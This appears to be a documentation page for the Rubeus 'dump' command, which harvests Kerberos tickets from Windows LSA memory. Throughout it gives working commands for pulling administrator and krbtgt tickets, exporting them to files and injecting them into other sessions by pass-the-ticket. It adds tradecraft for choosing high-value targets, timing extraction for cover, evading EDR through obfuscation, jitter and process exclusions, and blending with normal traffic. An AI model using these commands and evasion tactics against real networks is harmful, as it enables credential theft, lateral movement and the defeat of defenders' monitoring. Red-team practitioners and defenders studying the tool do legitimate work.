The dump command provides comprehensive Kerberos ticket extraction capabilities from system memory, supporting both targeted and bulk harvesting operations across user sessions.
Memory Extraction
Extract tickets directly from LSA memory structures
Multi-Session Support
Access tickets across all user sessions when elevated
Flexible Filtering
Target specific users, services, or session IDs
Export Ready
Base64-encoded output ready for injection or analysis
Extract all current Kerberos tickets from memory on the local system. This command provides comprehensive ticket harvesting capabilities, extracting both TGTs and service tickets for offline analysis and reuse.
# Extract from specific sessionRubeus.exe dump /luid:0x12345# Extract for specific userRubeus.exe dump /user:administrator# Extract specific service ticketsRubeus.exe dump /service:krbtgt
Copy
Ask AI
# Standard wrapped outputRubeus.exe dump# Unwrapped for easy copy/pasteRubeus.exe dump /nowrap# Combined with filteringRubeus.exe dump /service:cifs /nowrap
Controls base64 encoding output formatDefault Behavior: Base64 output wrapped at 76 characters
With /nowrap: Single-line base64 outputBenefits of /nowrap:
Easier copy/paste operations
Direct injection compatibility
Simplified scripting integration
Trade-offs: Less readable in terminal output
Basic Operations
Targeted Extraction
Server Targeting
Session Management
Copy
Ask AI
# Dump all tickets for current userRubeus.exe dump# System-wide extraction (elevated)Rubeus.exe dump# Unwrapped output for injectionRubeus.exe dump /nowrap
Legacy encryption types may indicate security weaknesses or attack opportunities
RC4
Type:0x17 - RC4-HMAC-MD5Risks:
Weaker encryption algorithm
Vulnerable to certain attacks
May indicate legacy systems
Possible downgrade attack
DES
Type:0x03 - DES-CBC-MD5Critical Issues:
Extremely weak encryption
Easily crackable
Legacy system indicator
Security vulnerability
2
Timing Analysis
Validity Period Assessment:
Compare start/end times for anomalies
Check for unusually long durations
Identify renewable vs. non-renewable tickets
Look for post-dated or future tickets
Renewal Patterns:
Standard TGT: 10 hours validity, 7 days renewable
Service tickets: 10 hours validity, not renewable
Anomalous patterns may indicate attacks
3
Principal Analysis
Service Principal Patterns:
krbtgt/* - Ticket Granting Tickets
cifs/* - File sharing access
host/* - General host services
http/* - Web service access
Custom SPNs for specialized services
Client Principal Assessment:
User accounts: username@DOMAIN
Machine accounts: COMPUTER$@DOMAIN
Service accounts: service@DOMAIN
4
Flag Interpretation
Hide Flag Analysis Matrix
Flag Value
Type
Delegation
Renewable
Forwardable
Risk Level
40a10000
Standard
No
Yes
Yes
Low
40e10000
Elevated
No
Yes
Yes
Medium
50a10000
Delegation
Yes
Yes
Yes
High
60a10000
Privileged
Advanced
Yes
Yes
Critical
Pass-the-Ticket
Intelligence Gathering
Persistence & Evasion
1
TGT Extraction & Reuse
Copy
Ask AI
# Extract all TGTs with clean outputRubeus.exe dump /service:krbtgt /nowrap# Extract from specific user sessionRubeus.exe dump /user:administrator /service:krbtgt /nowrap# Extract from elevated sessionRubeus.exe dump /luid:0x12345 /service:krbtgt /nowrap
2
Service Ticket Reuse
Copy
Ask AI
# Extract specific service ticketsRubeus.exe dump /service:cifs /server:fileserver.corp.local /nowrapRubeus.exe dump /service:http /server:web01.corp.local /nowrapRubeus.exe dump /service:ldap /server:dc01.corp.local /nowrap
3
Cross-Session Operations
Combine dump with session management for advanced scenarios
Copy
Ask AI
# Create new session contextRubeus.exe createnetonly /program:cmd.exe# Extract tickets from source sessionRubeus.exe dump /luid:0x[source] /nowrap# Inject into new sessionRubeus.exe ptt /ticket:[BASE64] /luid:0x[target]
1
Service Discovery
Analyze extracted tickets to map:
Accessible file shares (cifs tickets)
Web applications (http tickets)
Database servers (mssqlsvc tickets)
Administrative interfaces (ldap tickets)
Copy
Ask AI
# Extract all service tickets for analysisRubeus.exe dump | findstr "Server Name"
2
Privilege Assessment
Evaluate ticket privileges:
Administrative account indicators
Delegation capabilities
Service account access
Cross-domain relationships
Key Indicators:
Multiple krbtgt tickets (admin access)
Delegation flags in tickets
High-privilege service access
Machine account tickets
3
Infrastructure Mapping
Build network topology from tickets:
Domain controllers (krbtgt, ldap services)
File servers (cifs services)
Application servers (http, mssqlsvc)
Infrastructure relationships
1
Ticket Harvesting Strategy
Selective Extraction
Focus on high-value tickets:
Administrative TGTs
Service account credentials
Cross-domain tickets
Delegation-enabled tickets
Timing Considerations
Optimize extraction timing:
Business hours for cover
After authentication events
Before ticket expiration
During system maintenance
2
Storage & Management
Copy
Ask AI
# Export tickets for offline storageRubeus.exe dump /nowrap > tickets.txt# Organize by user/serviceRubeus.exe dump /user:admin /nowrap > admin_tickets.txtRubeus.exe dump /service:cifs /nowrap > file_tickets.txt# Prepare for injection scriptsRubeus.exe dump /service:krbtgt /nowrap | findstr "doIF" > tgts.txt
3
Operational Rotation
Ticket Lifecycle Management:
Regular extraction before expiration
Rotation of injected tickets
Cleanup of expired credentials
Renewal of high-value tickets
Detection Vectors
Evasion Strategies
Defensive Countermeasures
Rubeus dump operations can trigger multiple detection mechanisms
Understanding defensive capabilities helps in operational planning
Hide EDR/XDR Detection
Common Detection Methods:
API hooking and monitoring
Process behavior analysis
Memory pattern recognition
Machine learning anomaly detection
Evasion Considerations:
Research specific EDR capabilities
Test in isolated environments
Use custom compilation/obfuscation
Implement delays and jitter
Show Network Monitoring
Detection Capabilities:
Unusual Kerberos traffic patterns
Cross-network ticket usage
Authentication timing analysis
Protocol anomaly detection
Mitigation Strategies:
Use extracted tickets locally
Minimize cross-network activity
Blend with normal traffic
Avoid suspicious timing patterns
Show Domain Controller Logging
Audit Capabilities:
Authentication event logging
Ticket request monitoring
Privilege use auditing
Account logon tracking
Operational Awareness:
Understand audit policy settings
Plan for log analysis delays
Consider log retention periods
Account for SIEM integration
Access Issues
Data Issues
Output Issues
1
Privilege Problems
Symptoms:
“Access Denied” errors
Empty output despite tickets existing
LUID enumeration failures
Diagnosis:
Copy
Ask AI
# Check current privilegeswhoami /priv# Test with current user contextRubeus.exe dump# Verify LUID accessibilityRubeus.exe logonsession
Solutions:
Run from elevated context
Use appropriate user session
Check process integrity level
Verify SeDebugPrivilege
2
Anti-Malware Interference
Common Indicators:
Process termination
API call blocking
Memory access failures
Behavioral detection alerts
Mitigation Approaches:
Use process exclusions
Implement custom obfuscation
Modify compilation parameters
Use alternative execution methods
1
No Tickets Found
Root Causes:
User not authenticated to domain
Tickets expired or manually purged
Incorrect filtering parameters
Network authentication not performed
Troubleshooting:
Copy
Ask AI
# Check authentication statusRubeus.exe klist# Verify domain connectivitynltest /dsgetdc:domain.com# Test without filtersRubeus.exe dump# Check specific LUIDRubeus.exe dump /luid:0x3e7
2
Parsing Errors
Common Problems:
Corrupted ticket data in memory
Unsupported encryption algorithms
LSA subsystem inconsistencies
Memory layout changes
Resolution Steps:
Restart authentication services
Clear and regenerate tickets
Verify system integrity
Update Rubeus version
1
Formatting Problems
Symptoms:
Truncated base64 output
Encoding issues
Missing ticket sections
Garbled characters
Solutions:
Copy
Ask AI
# Use nowrap for clean outputRubeus.exe dump /nowrap# Redirect to fileRubeus.exe dump > output.txt# Focus on specific ticketsRubeus.exe dump /service:krbtgt /nowrap